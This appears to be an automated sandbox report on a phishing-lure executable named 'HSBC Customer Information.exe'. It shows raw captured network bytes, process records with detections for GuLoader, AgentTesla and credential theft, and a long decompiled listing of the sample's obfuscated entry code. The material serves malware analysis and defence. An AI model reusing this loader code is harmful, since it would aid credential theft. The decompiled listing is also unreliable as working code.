2021-09-15 05:14:39 UTC	148	IN	Data Raw: a8 a6 4d d7 40 44 2a cc e2 f2 89 69 9c 29 91 bb 1f 7e eb 28 e3 a6 9b c8 91 2e 2e 10 5b d4 23 12 02 7e 9b eb 5f 2c 91 12 0b f7 47 b6 a0 98 d9 9b d3 21 55 47 ed 30 29 ac d0 a4 52 1a 27 9c 26 25 52 3e 80 00 9d 1d fa 6e a3 2b 9e 84 37 40 ff 09 1a b9 ad 7f 11 0a e7 ff 1f 17 42 62 21 9f 1a 11 91 ba 59 6e 55 fc da 1f d1 33 2e bd 00 95 2d 12 3d 92 31 d8 d1 42 41 38 45 9c 37 ef 17 bf 87 74 55 36 db b7 4a 84 93 29 98 9a 8b ec 73 8f c9 7d 3d df 7e b5 51 89 e4 62 3f fb 1e f3 3a 28 4e b6 a5 fe 55 cb 35 d0 43 dd 59 02 75 8c d8 8b 5c 6a 25 29 cd 35 ed a8 f8 9c 26 89 c4 24 fd bf 67 ce fd 6c fa fc ad 9f d1 74 c9 e4 0a b0 6b be b0 8e 45 54 51 9d c1 6b f1 01 67 69 30 7e d7 f3 a5 1f 79 9f 59 0b 9e f6 8c a7 57 d7 c2 bb 4a 2a 35 e7 28 50 a9 0a 48 24 ad 8b 6f f4 40 ff 11 79 47 Data Ascii: M@Di)~(..[#~_,G!UG0)R'&%R>n+7@Bb!YnU3.-=1BA8E7tU6J)s}=~Qb?:(NU5CYu\j%)5&$gltkETQkgi0~yYWJ5(PH$o@yG
2021-09-15 05:14:39 UTC	156	IN	Data Raw: a7 14 9d 65 1e fe 68 14 fe d0 f4 65 8a 87 71 c5 8d a0 e8 c9 12 23 df ae a4 d4 64 e1 1e 2c cd 61 a6 98 39 3b e5 59 69 e8 63 a3 46 30 e0 b1 4b a7 f0 13 36 6c 39 4b d4 c9 28 3c 60 b1 26 3d 3e 8e aa 33 b0 68 13 ed 15 14 ac 9c e2 d2 d7 3c ba b8 9a 19 4a 2a 65 fc d0 89 a7 61 73 da 94 66 70 37 82 fd 26 91 60 1f 66 40 6c a5 7f 96 db 9a 5e f8 fe 49 12 28 c8 54 14 76 a8 8e c6 04 46 a7 71 f4 0c 30 79 cf f0 06 af f5 6e 62 84 2e 50 e1 6e d9 5a 8b 52 87 a4 fd 10 be 8d 76 1e 23 da fc ac b3 86 22 fe 55 5a 1b 17 6f 07 76 02 22 10 75 12 df 2b 6f a9 f7 c7 45 5b 72 a3 f3 75 1e e2 fe 61 fe c6 7e b0 c9 41 84 b7 67 f6 c9 93 3b 7e e4 88 f5 cc 6c 4d 52 ac 31 ae b2 bd 39 12 0b 4b 35 89 31 86 a6 42 03 f8 3b e2 b7 8e ce 83 18 49 08 69 e2 4a 30 2d 51 fa f3 65 04 b2 0e 29 d3 72 b8 b3 Data Ascii: eheq#d,a9;YicF0K6l9K(<`&=>3h<J*easfp7&`f@l^I(TvFq0ynb.PnZRv#"UZov"u+oE[rua~Ag;~lMR19K51B;IiJ0-Qe)r
2021-09-15 05:14:39 UTC	164	IN	Data Raw: c8 b5 d0 05 f8 32 f5 32 99 f0 23 04 83 63 91 63 89 d9 ea ce 3d 59 22 c9 a6 79 f1 d7 a4 3a 28 9e 76 7f f5 41 d8 d0 d5 2b 81 2a 4e f5 e1 e9 cd c2 5d 13 da 98 20 81 50 4a 6d 68 70 b2 9d 7f ab d2 f1 aa 32 b6 d3 a4 3f 42 2b 8c 01 ec 25 76 b2 7d 0a 0b 84 f5 98 c3 45 1b 96 5c 07 55 96 76 1d 8e 04 ea f6 57 99 e4 79 10 0a 69 de 9c a0 92 19 bd 88 95 c7 07 4f 3a 05 53 7a 80 f6 8b cd 8c cc 54 af 04 57 c2 95 b8 3e b0 eb 55 6b a6 05 f5 0e dc da e9 a0 01 52 9c 88 f2 4a d4 82 be 18 4d 28 ac ac 1a d8 ea 28 d1 ff dc 2c 92 7f 22 bb df 56 a2 c6 4c 3e 64 fa 9f e2 84 46 27 54 be 61 9b 3d e2 97 53 1c de ed a7 c3 64 71 fa d4 fe c2 7c e6 b1 6d 4d d9 59 e9 80 c2 a3 18 6b 85 96 8d f1 85 e5 7c a0 a3 7b 44 c4 04 2d ca aa ed 73 6c 7a 21 08 c4 e6 37 85 2d 25 d5 54 71 f2 7d 31 0d 1e c8 Data Ascii: 22#cc=Y"y:(vA+*N] PJmhp2?B+%v}E\UvWyiO:SzTW>UkRJM((,"VL>dF'Ta=Sdq\|mMYk\|{D-slz!7-%Tq}1
2021-09-15 05:14:39 UTC	172	IN	Data Raw: 3d 07 ac a4 1d 7e 6a 86 a4 42 04 ea 16 b1 60 69 23 54 ca 46 11 a1 d5 2e 8f c4 f2 ba e1 70 5e b9 84 bb 54 06 9a 64 67 73 20 cc 47 52 09 44 b0 74 4b 73 fb 39 81 81 9b 00 0f da 51 65 40 7c fb 0a d7 e4 4f b6 c5 01 5c f6 7e 43 82 36 a6 f6 ce 46 e9 77 dc f0 83 15 7d 9c 65 df 5e 23 bb a1 03 56 98 35 1f fe a9 b6 21 6b 01 3f 81 82 00 3f 78 e4 d6 d5 b5 d6 57 7e 77 e9 97 dd 48 3c 39 3c c0 75 23 e0 0e 2a d0 e0 ff c9 91 07 4b eb cf c7 17 cf 3c ec a2 0a f6 88 8b 66 cd 8f f2 22 20 6d 39 83 de ae 93 30 fe ba 3e 75 e3 bc 9a 6f 55 a4 46 9a 98 08 22 98 3a bf fc ff 41 ed f8 d1 92 52 9d 18 13 ff e6 f3 2b 2a 34 b7 5c 13 14 43 d1 79 5f 44 3b c1 c7 90 d0 93 f8 d7 f1 d7 9b cb 20 5d 9a a3 9e 46 89 4f ea 67 1c bc 20 b2 be 47 c6 24 a6 1f 28 08 76 69 f0 a4 da eb d6 39 98 9d 41 d0 e1 Data Ascii: =~jB`i#TF.p^Tdgs GRDtKs9Qe@\|O\~C6Fw}e^#V5!k??xW~wH<9<u#K<f" m90>uoUF":AR+4\Cy_D; ]FOg G$(vi9A
2021-09-15 05:14:39 UTC	180	IN	Data Raw: 4c 8a ce 64 58 fc 61 02 d8 46 68 a2 70 3e b2 28 b7 b5 21 20 48 e2 64 e1 e0 42 7c d5 57 d7 6c ae 60 89 af 09 72 a4 65 23 e8 97 98 22 71 4b 69 69 d9 6c 49 53 36 1d 9d bc 6c 36 49 32 aa 81 8e c6 fe ea b5 2c 42 e3 3f 25 56 34 de 1e c0 75 6e 5d e9 cc 06 6c 5d 4b 6d d1 00 28 2e bc 44 ba 93 89 47 32 0a f6 b9 c9 30 dc 58 f7 e9 17 00 d8 6c 1e 8c eb 57 b3 a0 40 32 49 a1 cf 08 44 26 65 cc c3 be 74 39 63 a0 05 aa ef 20 ad 5e 33 b5 f8 d2 5f 86 fd 13 35 48 fd d4 f2 f6 17 6a 6a a3 cd 32 d2 15 16 fe c6 0a 35 72 43 0d d8 f4 98 52 21 18 89 bd da 05 86 01 85 37 0b 0b ea 18 13 9a a7 74 32 40 2b 96 70 cc c3 e9 54 47 c2 21 cf 68 1d fd 98 55 a8 1c e1 ae 4f 1d ae 21 62 a6 3f 04 68 06 6c 64 8f 21 bf ca c4 4f 45 d7 53 8f 64 e2 db c0 96 5c 52 84 cc 1e e2 98 19 67 b2 30 de 42 b4 0b Data Ascii: LdXaFhp>(! HdB\|Wl`re#"qKiilIS6l6I2,B?%V4un]l]Km(.DG20XlW@2ID&et9c ^3_5Hjj25rCR!7t2@+pTG!hUO!b?hld!OESd\Rg0B
2021-09-15 05:14:39 UTC	187	IN	Data Raw: ed 97 97 49 3f 35 9f c3 14 c7 f7 1d f0 c2 6d e5 81 b9 d6 d9 7c ee 32 aa ad 18 6b 0a 81 50 7b 84 81 6b 98 42 b2 e6 c4 ca 31 17 a6 ed e4 bd c2 f8 23 c4 7a 59 af e4 2b d5 45 b4 d4 b3 ad 1d 3b 45 b9 a4 92 d1 2b 9d 0d f0 77 f0 eb fa 1b 98 8c 1c 09 f3 94 53 05 88 56 2c e9 3b 39 88 85 a9 19 1f c9 7f 7f 79 ef 40 bb 87 3f a9 55 7a b5 a2 13 23 8d a7 fe 51 6f 4f 4d 69 de 96 95 1a 5f 83 6c 24 51 a7 04 de a2 f8 df 48 bb a0 87 40 64 e8 f3 7d 5d ab 06 c0 d6 43 27 4d d7 8d 32 41 9e 7f b0 00 2f 87 5b d6 0f 80 1b 6f 6d 96 0b e4 ee b3 a3 6c 65 1d 28 35 ac 6a c2 4e b7 d6 f7 91 eb c9 e9 45 c1 b2 7d e4 e3 24 64 61 f6 15 94 c4 57 d6 ab df 6e 35 67 6c cc db 57 49 13 00 d8 e9 45 e7 6d 21 a5 26 9f 72 08 03 13 e6 63 dd fe d4 7c 1d 59 f8 60 d3 60 01 fd c2 7c a4 65 7d eb 17 81 c4 73 Data Ascii: I?5m\|2kP{kB1#zY+E;E+wSV,;9y@?Uz#QoOMi_l$QH@d}]C'M2A/[omle(5jNE}$daWn5glWIEm!&rc\|Y``\|e}s
2021-09-15 05:14:39 UTC	195	IN	Data Raw: 0f 13 7f 9d f1 6e 40 34 67 36 2c 72 cf d3 4c 35 a2 4b a9 c7 f2 ba 05 9b 58 f5 55 f3 b6 45 30 88 c7 f4 46 ee b3 ea 8c 56 5a 61 a4 be 2a bf 26 e3 74 28 d8 1d 7f b2 29 d8 de bd 72 eb f4 41 b2 8a e9 8c b1 24 7e b9 9d 42 a2 37 30 03 2e 1b b2 fa 1a df 8e b2 8d 41 9b 94 09 53 0c 2b d8 73 8d 4b 06 d4 14 60 71 e7 6d f4 87 29 59 fa 33 64 3d 96 64 6c b6 61 50 9f 1d eb 89 3b 7c 65 09 b5 da c7 b6 12 0c e2 c4 98 44 2e 54 56 35 1f ad f5 b3 ad 0f a4 1a af f0 a8 b6 ca d3 5c ce 98 48 3d 45 71 8f 65 0a 97 82 a0 43 3e 9a d3 89 6f 83 ee 9b 5d 91 b2 ea c0 1a 9f 95 28 0e 92 31 75 d6 13 56 61 b3 3a cd a5 15 79 01 92 7b 83 cd 46 7d b9 db 04 d3 7a 9f f8 f5 7c 5f e2 cf a2 66 9d 92 b5 92 c2 23 83 fa 1d a4 ab 17 aa 6a 06 c7 7d 05 f1 ee ec 0a 84 c5 09 e6 ca c2 87 a8 04 7e b3 c8 99 81 Data Ascii: n@4g6,rL5KXUE0FVZa*&t()rA$~B70.AS+sK`qm)Y3d=dlaP;\|eD.TV5\H=EqeC>o](1uVa:y{F}z\|_f#j}~
2021-09-15 05:14:39 UTC	203	IN	Data Raw: 57 32 cb ff a6 ad 56 eb 29 43 11 7f cf 60 19 fd 0f 49 8d 39 27 ad 30 01 5f 7a 62 ae 37 07 de 06 bb 65 6e 21 d0 ff db 14 47 d6 41 ba e3 db bc c1 70 4c 1a 80 f3 41 ee 90 1a 47 24 3e cb 40 50 17 d2 b8 a9 56 95 fc 54 80 f9 95 02 0b d0 50 ed 40 ed f3 ed d4 87 4f 31 d5 07 5b f7 60 d5 85 0f a3 11 cd 2b f7 cc cb d2 87 14 73 04 6b b3 25 c4 b9 e8 50 f3 fb 43 7a 93 87 77 44 3a 2b 8a e6 8d 76 ab 0b 83 a5 fb e5 32 38 2b 03 6c fa cc 3b 0c 7b 51 a1 05 6b 02 7a 3d 97 6a 94 d1 ff 4c 0a 9b a0 b3 78 3a 53 6f af af 86 90 ea 72 b9 d2 ad 6b 4e 88 4d 73 b4 2b f4 12 a1 28 6b 1e 90 cc f5 8a 30 f7 38 35 f4 06 56 5b 45 de 99 a0 1e 7b f8 6a 95 b2 8c 65 16 3c f5 e2 2b 22 32 34 4e 34 34 b6 d3 06 4c a2 2e c9 c6 83 d0 01 d0 32 e6 31 9d 96 21 5b 8a a4 9f 46 89 d9 ea cd 3b 4b 02 cd b8 6c Data Ascii: W2V)C`I9'0_zb7en!GApLAG$>@PVTP@O1[`+sk%PCzwD:+v28+l;{Qkz=jLx:SorkNMs+(k085V[E{je<+"24N44L.21![F;Kl
2021-09-15 05:14:39 UTC	211	IN	Data Raw: 92 fc b3 7f ae d3 07 4a 7c ea e1 8d 05 51 ca a3 65 46 d3 52 70 d1 05 45 ff 32 07 df 43 60 3a 78 29 ad cb 95 ca 2f 0b 1d ea 63 e7 fc c9 72 47 5a 39 66 db 69 cb f7 16 77 b9 60 a7 68 2f a5 c3 64 23 7b 8e 1b 6f 5b d2 76 93 93 19 7d bd 43 41 b7 03 c7 45 be e2 a7 d7 50 aa 9c cd 49 4c d6 be 89 1e 66 40 e7 52 0e 67 51 a8 4f ae 01 f9 77 b5 44 bf 9b 07 49 f0 1b 00 a9 34 84 3f 23 f7 e8 06 83 db 7d b0 11 01 54 ce a3 4b 6e 4b a0 cf 08 d2 26 60 db 24 bc 0a 39 4f fc 05 aa ef 20 3b 5e 6a b1 18 d8 30 06 07 41 3f 58 f5 c9 61 e6 c7 63 8b ac a1 b3 89 54 11 e6 de 12 be 77 ca 0b 3c eb e0 5a b8 55 0a 89 de 05 11 00 9f 18 cd 0c 8a 1d bc c3 b8 71 2f 45 a0 93 d8 cd 21 cb 28 4f 0e 74 ca 6e 00 f8 0c 57 89 25 0e aa 12 1e 43 73 6e a8 31 03 f6 04 ab 7d 6c 3b ca d7 d6 1b 5a ca 56 87 d2 Data Ascii: J\|QeFRpE2C`:x)/crGZ9fiw`h/d#{o[v}CAEPILf@RgQOwDI4?#}TKnK&`$9O ;^j0A?XacTw<ZUq/E!(OtnW%Csn1}l;ZV

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: HSBC Customer Information.exe PID: 6392 Parent PID: 5532

General

Start time:	07:11:04
Start date:	15/09/2021
Path:	C:\Users\user\Desktop\HSBC Customer Information.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\HSBC Customer Information.exe'
Imagebase:	0x400000
File size:	122880 bytes
MD5 hash:	448F83467C61E465162DAF7CF8D9E88F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.591786294.0000000002240000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: RegAsm.exe PID: 6140 Parent PID: 6392

General

Start time:	07:12:57
Start date:	15/09/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\HSBC Customer Information.exe'
Imagebase:	0xbf0000
File size:	64616 bytes
MD5 hash:	6FD7592411112729BF6B1F2F6C34899F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 5140 Parent PID: 6140

General

Start time:	07:12:58
Start date:	15/09/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: HSBC Customer Information.exe PID: 6392 Parent PID: 5532 HSBC Customer Information.exeCOMMON

Executed Functions

Function 004017AC, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 592
COMMONCrypto

Download Yara Rule

C-Code - Quality: 69%

			_entry_(signed int __eax, signed char __ebx, signed int __ecx, signed char __edx, signed int* __edi, void* __fp0) {
				intOrPtr* _t141;
				void* _t142;
				signed int _t144;
				signed char _t145;
				signed char _t148;
				signed int _t149;
				signed char _t150;
				void* _t151;
				signed int _t153;
				signed int _t156;
				signed int _t159;
				signed int _t161;
				signed char _t162;
				signed char _t165;
				signed int _t197;
				void* _t212;
				signed int _t213;
				signed int _t216;
				signed int _t217;
				signed char _t246;
				void* _t248;
				signed char _t254;
				void* _t255;
				signed int* _t258;
				signed int _t260;
				intOrPtr* _t262;
				signed int _t266;
				signed int _t267;
				intOrPtr* _t271;
				signed int* _t272;
				signed short _t290;
				void* _t294;
				signed int _t295;
				signed int _t296;
				signed int _t301;
				signed int _t303;
				signed int _t305;
				intOrPtr _t316;
				intOrPtr _t317;
				signed int _t320;
				intOrPtr _t326;
				signed int _t329;
				intOrPtr _t337;
				void* _t341;
				intOrPtr _t346;
				intOrPtr _t347;
				signed int _t369;

				_t257 = __edi;
				_t254 = __edx;
				_t215 = __ecx;
				_t166 = __ebx;
				_push("VB5!6&*"); // executed
				L004017A6(); // executed
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax ^ __eax;
				 *__eax =  *__eax + __eax;
				_t141 = __eax + 1;
				 *_t141 =  *_t141 + _t141;
				 *_t141 =  *_t141 + _t141;
				 *_t141 =  *_t141 + _t141;
				 *_t141 =  *_t141 + __ecx;
				_pop(_t142);
				asm("stc");
				asm("out dx, al");
				asm("adc edx, [ebx-0x56]");
				asm("cdq");
				_t144 = _t142 - 0x00000001 ^  *__edi;
				if(_t144 < 0) {
					L5:
					 *_t144 =  *_t144 + _t144;
					 *_t144 =  *_t144 + _t144;
					_t266 = _t266 - 1;
					 *_t144 =  *_t144 + _t144;
					 *_t144 =  *_t144 + _t144;
					_t145 = _t144 |  *_t144;
				} else {
					_push(ds);
					_t215 = 0;
					 *_t144 =  *_t144 + _t144;
					 *_t144 =  *_t144 + _t144;
					 *0 =  *0 + _t144;
					 *_t144 =  *_t144 + _t144;
					 *__ebx =  *__ebx + _t144;
					_t145 = _t144 +  *0;
					 *_t145 =  *_t145 + _t145;
					_t1 = _t145 + 0x6c;
					 *_t1 =  *((intOrPtr*)(_t145 + 0x6c)) + __edx;
					if( *_t1 == 0) {
						_t266 =  *0xFFFFFFFF0BAF3331 * 0x736e6f63;
						if (_t266 != 0) goto L3;
						 *_t145 =  *_t145 + _t145;
						 *_t145 =  *_t145 + _t145;
						_t213 = __ebx + __ebx;
						 *_t145 =  *_t145 ^ _t145;
						_t301 = _t301;
						_t257 = __edi -  *0xFFFFFFFF1A219945;
						asm("sbb al, 0x69");
						es = es;
						asm("cmpsb");
						asm("bound esp, [edi+0x4f3a8358]");
						asm("lodsd");
						_t165 = (_t145 | 0x00000032) ^  *(__edx - 0x74cf43bc);
						asm("stosb");
						 *((intOrPtr*)(_t165 - 0x2d)) =  *((intOrPtr*)(_t165 - 0x2d)) + _t165;
						_t144 = _t213 ^  *0xFFFFFFFFB711CF66;
						_t166 = _t165;
						 *_t144 =  *_t144 + _t144;
						 *_t144 =  *_t144 + _t144;
						 *_t144 =  *_t144 + _t144;
						 *_t144 =  *_t144 + _t144;
						 *_t144 =  *_t144 + _t144;
						 *_t144 =  *_t144 + _t144;
						 *_t144 =  *_t144 + _t144;
						 *_t144 =  *_t144 + _t144;
						 *_t144 =  *_t144 + _t144;
						 *_t144 =  *_t144 + _t144;
						 *_t144 =  *_t144 + _t144;
						 *_t144 =  *_t144 + _t144;
						 *_t144 =  *_t144 + _t144;
						 *_t144 =  *_t144 + _t144;
						 *_t144 =  *_t144 + _t144;
						 *_t144 =  *_t144 + _t144;
						 *_t144 =  *_t144 + _t144;
						goto L5;
					}
				}
				 *((intOrPtr*)(_t215 + 0x56 + _t215 * 2)) =  *((intOrPtr*)(_t215 + 0x56 + _t215 * 2)) + _t215;
				_push(_t166);
				_push(_t301);
				_t258 =  &(_t257[0]);
				_t267 = _t266 - 1;
				_t294 = 0xffffffff85d79969;
				_push(_t301);
				 *0x53000b01 =  *0x53000b01 + _t215;
				_t316 =  *0x53000b01;
				asm("outsd");
				asm("insd");
				asm("insd");
				asm("popad");
				if(_t316 <= 0) {
					L13:
					asm("arpl [ebp+0x70], sp");
					if(_t320 == 0) {
						goto L18;
					} else {
						asm("outsd");
						 *0x1040759 =  *0x1040759 + _t145;
						_t149 = _t145 | 0x00000008;
						asm("out dx, eax");
						 *_t254 =  *_t254 + _t254;
						 *_t149 =  *_t149 + _t149;
						 *_t166 =  *_t166 + 1;
						goto L15;
					}
				} else {
					asm("insb");
					asm("insd");
					if(_t316 != 0) {
						L11:
						_t267 =  *(_t254 + 0x31) * 0x7f041100;
						 *(_t215 + _t145) =  *(_t215 + _t145) | _t166;
						_t258 = 0xb013b04;
						 *_t145 =  *_t145 + _t145;
						 *_t166 =  *_t166 + 1;
						 *_t145 =  *_t145 - _t145;
						 *_t145 =  *_t145 + _t145;
						goto L12;
					} else {
						 *_t215 =  *_t215 + _t166;
						 *_t145 =  *_t145 + _t145;
						_t254 = _t254 + 1;
						 *_t254 =  *_t254 + _t145;
						 *((intOrPtr*)(_t166 + _t215)) =  *((intOrPtr*)(_t166 + _t215)) + _t301;
						_t21 = _t166 + 0x6f;
						 *_t21 =  *((intOrPtr*)(_t166 + 0x6f)) + _t254;
						_t317 =  *_t21;
						asm("insd");
						asm("insd");
						asm("popad");
						if(_t317 <= 0) {
							L15:
							 *_t149 =  *_t149 + _t149;
							 *_t166 =  *_t166 + _t149;
							asm("lldt word [ebx+0x75]");
							asm("bound esi, [ebx+0x74]");
							asm("popad");
							asm("a16 jae 0x78");
							if( *_t166 >= 0) {
								_t290 =  *_t258 * 0x100;
								 *_t258 =  *_t258 + _t215;
								 *((intOrPtr*)(_t290 + 0x4f)) =  *((intOrPtr*)(_t290 + 0x4f)) + _t149;
								_push(_t254);
								_t215 = _t149;
								_push(_t301);
								_t166 = _t166 - 1;
								_t258 = _t258 - 1;
								_t294 = _t294 + 1 - 1 + 1 - 1;
								_push(_t149);
								 *0xda06b6 =  *0xda06b6 + _t149;
								 *_t149 = cs;
								asm("out dx, eax");
								 *_t254 =  *_t254 + _t254;
								_t162 = _t149 +  *_t149;
								 *_t166 =  *_t166 + 1;
								 *_t162 =  *_t162 ^ _t162;
								 *_t162 =  *_t162 + _t162;
								_t145 = _t162 + 0xa;
								_t258[0x1b] = _t258[0x1b] + _t215;
								_t301 =  *[fs:edi+0x74] * 0x676e696e;
								 *_t215 =  *_t215 + _t145;
								 *((intOrPtr*)(_t145 + _t145)) =  *((intOrPtr*)(_t145 + _t145)) + _t215;
								_push(_t290 - 1);
								goto L17;
							}
						} else {
							asm("insb");
							asm("insd");
							if(_t317 == 0) {
								 *0x1981 =  *0x1981 + _t254;
								asm("sbb [fs:eax], eax");
								 *_t166 =  *_t166 + _t215;
								asm("adc eax, 0x1f320000");
								 *_t145 =  *_t145 + _t145;
								 *((intOrPtr*)(_t267 + 3)) =  *((intOrPtr*)(_t267 + 3)) + _t145;
								 *_t215 =  *_t215 + 1;
								asm("sbb al, [eax]");
								 *_t145 =  *_t145 + _t145;
								 *((intOrPtr*)(_t145 + _t145)) =  *((intOrPtr*)(_t145 + _t145)) + _t145;
								_t301 = _t301 + 2;
								goto L11;
							}
							L12:
							 *_t254 =  *_t254 + _t145;
							_push(es);
							 *((intOrPtr*)(_t215 + 0x62)) =  *((intOrPtr*)(_t215 + 0x62)) + _t215;
							asm("gs insb");
							_t145 = _t145 ^  *_t145;
							 *_t215 =  *_t215 + _t145;
							 *_t145 =  *_t145 | _t145;
							_t320 =  *_t145;
							if(_t320 < 0) {
								L17:
								_t267 =  *(_t215 + 0x6d) * 0x616d6e69;
								asm("outsb");
								L18:
								asm("a16 xor eax, 0x6d90500");
								asm("out dx, eax");
								 *_t254 =  *_t254 + _t254;
								 *_t166 =  *_t166 + 1;
								_t148 =  *_t166 +  *( *_t166) ^ 0x00000000;
								 *_t148 =  *_t148 + _t148;
								_t149 = _t148 + 0x4146000d;
								_t258 =  &(_t258[0]);
							} else {
								goto L13;
							}
						}
					}
				}
				_push(_t254);
				_t295 = _t294 + 1;
				_t216 = _t215 - 1;
				_t260 =  &((_t258 - 1)[0]);
				_push(_t166);
				_t271 = _t267 + 1 + 1;
				 *_t216 =  *_t216 + _t149;
				 *0x6b616400 =  *0x6b616400 + _t216;
				_t326 =  *0x6b616400;
				asm("gs outsb");
				if(_t326 == 0) {
					L30:
					 *0x20006dc =  *0x20006dc + _t149;
					_t216 = 6;
					asm("out dx, eax");
					 *_t254 =  *_t254 + _t254;
					_push(es);
					_t166 = _t166 + _t166;
					goto L31;
				} else {
					if(_t326 >= 0) {
						L31:
						 *_t166 =  *_t166 + 1;
						goto L32;
					} else {
						if(_t326 < 0) {
							L32:
							_t271 = _t271 +  *_t271;
							 *_t149 =  *_t149 + _t149;
							 *_t149 =  *_t149 + _t216;
							_push(cs);
							_t48 = _t260 + 0x6c + _t295 * 2;
							 *_t48 =  *((intOrPtr*)(_t260 + 0x6c + _t295 * 2)) + _t149;
							asm("insd");
							asm("popad");
							asm("outsb");
							asm("gs outsb");
							if( *_t48 >= 0) {
								goto L49;
							} else {
								asm("outsb");
								asm("insb");
								_t260 =  *_t216 * 0xe010100;
								goto L34;
							}
						} else {
							if (_t326 == 0) goto L23;
							_t149 = _t149 + 0x23d0829;
							if(_t149 > 0) {
								asm("out dx, eax");
								 *_t254 =  *_t254 + _t254;
								_t149 = _t149;
								 *_t166 =  *_t166 + 1;
							}
							_t295 = _t295 +  *((intOrPtr*)(_t149 + _t149));
							 *_t149 =  *_t149 + _t149;
							_push(es);
							 *_t149 =  *_t149 | _t149;
							_t329 =  *_t149;
							_push(_t301);
							asm("popad");
							asm("a16 popad");
							if(_t329 >= 0) {
								L36:
								_push(0x6169626f);
							} else {
								if(_t329 != 0) {
									L34:
									_push(cs);
									_t54 = _t295 + 0x6d;
									 *_t54 =  *((intOrPtr*)(_t295 + 0x6d)) + _t149;
									_t337 =  *_t54;
									if(_t337 == 0) {
										goto L51;
									} else {
										if (_t337 < 0) goto L50;
										goto L36;
									}
								} else {
									 *[fs:ecx] =  *[fs:ecx] + _t149;
									 *_t216 =  *_t216 + _t216;
									 *((intOrPtr*)(_t260 + 0x61)) =  *((intOrPtr*)(_t260 + 0x61)) + _t254;
									_pop(_t212);
									_t161 = _t149 + 0x8340a53;
									_t166 = _t212 + _t212;
									_t272 =  *(_t295 + 0x72) * 0x6d6f64 +  *_t254;
									 *_t161 =  *_t161 + _t161;
									 *_t260 =  *_t260 + _t161;
									_t159 = _t161 | 0x49524400;
									_t254 = _t254 + 1;
									_push(_t254);
									_push(_t254);
									_t260 = _t260 + 1;
									_push(_t295);
									_t296 = _t295 + 1;
									_push(_t166);
									 *_t216 =  *_t216 + _t159;
									 *_t166 =  *_t166 + _t216;
									_t45 =  &(_t272[0x1b]);
									 *_t45 = _t272[0x1b] + _t159;
									if( *_t45 < 0) {
										_pop(_t305);
										_pop(es);
										asm("out dx, eax");
										 *_t254 =  *_t254 + _t254;
										 *_t159 =  *_t159 | _t159;
										 *_t166 =  *_t166 + 1;
										goto L43;
									} else {
										_t305 =  *(_t296 + 0x72) * 0x67;
										if(_t305 < 0) {
											L43:
											_t272 = _t272 +  *_t260;
											 *_t159 =  *_t159 + _t159;
											 *_t254 =  *_t254 + _t217;
											_t341 =  *_t254;
											asm("sldt word [ecx+0x64]");
											if(_t341 <= 0) {
												 *((intOrPtr*)(_t217 + 0x6d)) =  *((intOrPtr*)(_t217 + 0x6d)) + _t217;
												asm("popad");
												 *[gs:bx+si] =  *[gs:bx+si] ^ _t159;
												asm("sbb [edx], al");
												goto L62;
											} else {
												asm("outsb");
												if(_t341 == 0) {
													L64:
													 *((intOrPtr*)(_t254 + 0x4d)) =  *((intOrPtr*)(_t254 + 0x4d)) + _t159;
													goto L65;
												} else {
													if(_t341 < 0) {
														L62:
														_t254 = _t254 + _t272[0x1b00002a];
														if (_t254 == 0) goto L63;
														_t272[0x1080002a] = _t272[0x1080002a] + _t217;
														goto L64;
													} else {
														if(_t341 >= 0) {
															L65:
															_t254 = _t254 + 1;
															_t295 = _t296 - 1;
															asm("scasb");
															 *_t159 =  *_t159 + _t159;
															 *_t159 =  *_t159 + _t159;
															 *_t272 =  *_t272 + _t166;
															 *_t159 =  *_t159 + _t159;
															 *_t159 =  *_t159 + _t217;
															 *_t159 =  *_t159 + _t159;
															 *((intOrPtr*)(_t159 + 0x2000001)) =  *((intOrPtr*)(_t159 + 0x2000001)) + _t166;
															_t150 = _t159 +  *_t159;
															 *_t217 =  *_t217 + _t150;
															 *_t217 =  *_t217 + _t150;
															 *_t150 =  *_t150 + _t150;
															 *_t150 =  *_t150 + _t150;
															 *((intOrPtr*)(_t150 - 0x58)) =  *((intOrPtr*)(_t150 - 0x58)) + _t254;
															 *_t150 =  *_t150 + _t150;
															 *_t150 =  *_t150 + _t150;
															 *_t150 =  *_t150 + _t150;
															 *_t150 =  *_t150 + _t150;
															 *_t150 =  *_t150 + _t150;
															 *_t150 =  *_t150 + _t150;
															goto L66;
														} else {
															asm("insb");
															asm("popad");
															if(_t341 < 0) {
																L55:
																_t272 = _t271 - 1;
																asm("outsd");
																asm("outsb");
																asm("o16 gs outsb");
																asm("gs outsb");
																if(_t347 >= 0) {
																	goto L67;
																} else {
																	if (_t347 >= 0) goto L68;
																	_t296 =  *(_t260 + 0x38) * 0;
																}
															} else {
																 *_t217 =  *_t217 + _t159;
																 *_t272 =  *_t272 + _t217;
																 *((intOrPtr*)(_t217 + 0x42)) =  *((intOrPtr*)(_t217 + 0x42)) + _t159;
																_t260 = _t260 - 1;
																_push(_t295);
																_t301 = _t305 - 1;
